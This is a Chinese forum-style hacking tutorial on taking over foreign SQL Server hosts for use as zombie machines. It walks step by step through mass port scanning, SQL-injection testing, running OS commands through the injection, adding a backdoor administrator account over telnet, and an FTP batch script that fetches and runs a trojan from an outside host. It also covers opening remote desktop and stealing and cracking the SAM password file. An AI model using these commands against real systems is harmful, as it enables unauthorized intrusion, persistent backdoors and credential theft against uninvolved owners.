由于最近要破解一个文件迫切需要一台"高速"肉鸡用，所以想找个现成的，发现很多论坛发布sql肉鸡，不过经过我测试(利用sqltools上传程序，提示成功，但就是找不到文件)很多都不能用，可能对方的杀毒软件把你的给杀了，也可能是对方的磁盘不允许修改，帐户权限低，下面我们换一种思路来走进sql主机。

为了找到一台合适的肉鸡，自己来动手吧,首先锁定目标，用ip数据库查询器查找韩国或者日本的ip(只要不是中国的就行)，拿出scanner来扫描开放80和1433端口的主机，因为我们是利用web程序来查找开放大门主机，所以要扫描开放1433服务的主机。cmd下进入scanner所在的目录，输入命令：scanner TCP 168.188.0.0 168.188.255.255 80,1433 400 /save 然后运行，意思是系统用400线程扫描该段80和1433端口开放的主机，并将结果保存，好了，让他扫描吧，扫描结束后在该目录下的result.txt中保存结果。打开result.txt，里面已经有不少符合条件主机等着我们的光临。随便复制一个ip 168.188.xxx.xxx，打开浏览器，访问该网站，访问该网站的分页面，http://168.188.xxx.xxx/read.asp?page=1&no=16,在后面加入的and 1=1页面显示正常，输入 and 1=2出现错误：

Microsoft OLE DB Provider for SQL Server error ’80040e14’

Incorrect syntax near the keyword ’where’.

/movie/movie.asp, line 128

好，该主机存在漏洞，那就拿下他。这次我用另外一个小工具GYSIcmd来打开进入主机的小门，该工具能够利用利用网站程序漏洞运行DOS命令，在注入地址中输入http://168.188.xxx.xxx/read.asp?page=1&no=16，然后在DOS命令中输入net start telnet ，现在已开启了telnet服务，接着执行net user qq qq123 /add为进入主机添加一个帐号，提升为管理员net localgroup administrators qq /add ,到此已经完成了进入前的准备工作.
下面在为进入主机铺上一条小路，我们好从这上面走过去呀。 在桌面上新建一个CMD快捷方式，指向C:\WINNT\system32\CMD.EXE ,选中属性中的以其他用户身份运行。现在运行该程序，在用户中用我们刚才建立的用户qq(qq123)运行，直接运行telnet 168.188.xxx.xxx ，提示是否发送密码，输入y，这就进入了主机。呵呵，偷偷的进了人家屋里了，该控制了，下面来给它传文件，传个反弹木马，或者开3389，由于我的速度很慢，就不在我机子上开tftp服务了，直接用一个批处理文件来传送，输入：

echo open ftp.myweb.com 21>ftp.txt
echo name>>ftp.txt
echo password>>ftp.txt
echo get hack.exe>>ftp.txt
echo bye

一次一行，输入完后就在对方根目录下有了一个文件ftp.txt，下面执行：
ftp -s:ftp.txt
在屏幕上可看到一行行的显示执行，你能看到执行的过程，他是看不到的，文件传完了，删除该文件del ftp.txt
运行hack.exe，好，打开我机子上的鸽子，显示有主机上线，呵呵，到手了，任务完成了，想干什么就做吧，不过奉劝一句，不要破坏，即使是国外的机子，要不要删他的数据，除非反华的或者色情站点。如果想更方便的控制，可给他开3389。然后登陆3389进行管理，帮他补上漏洞(作雷锋了)..
在我进入的主机中，碰到的情况是不一样的，有的主机已开了3389，可以利用命令query user 查看主机在线人员，如果管理员在线，通时还有人使用3389登陆到了主机，那么很可能就是已经被人捷足先登了，踢他出去logoff 1 ，怎么办在自己了.
如果传送上去的文件无法运行，那就说明对方已经禁止运行权限，只是允许某个特定的用户有运行权限，这时可以传他的sam文件，进入C:\WINNT\repair>目录，利用FTP的上传功能，来破解他的用户密码。破解sam密码的软件很多，如LC，最近不是出了一款新的，好象叫SAMinside.破解出来密码后，挨着试试，一般不会超过6个用户，定有一个帐户有运行权限。如果都不行，那么还有一个方法...不过该方法虽能运行，但运行后管理员登陆就能发现主机被人入侵，所以就不说了，谁有更好后的办法运行，多多指教。
方法不局限于一点 一个学习网络安全的爱好者 也切忌把自己的思维固定在一点 ,一定要活跃 还要在踏上这条路的时候 一定要学会好好使用搜索引擎和独立思考的习惯\因为你一开始就是一个黑暗中孤独的天使啊\唯一依靠自己才是最好的武器啊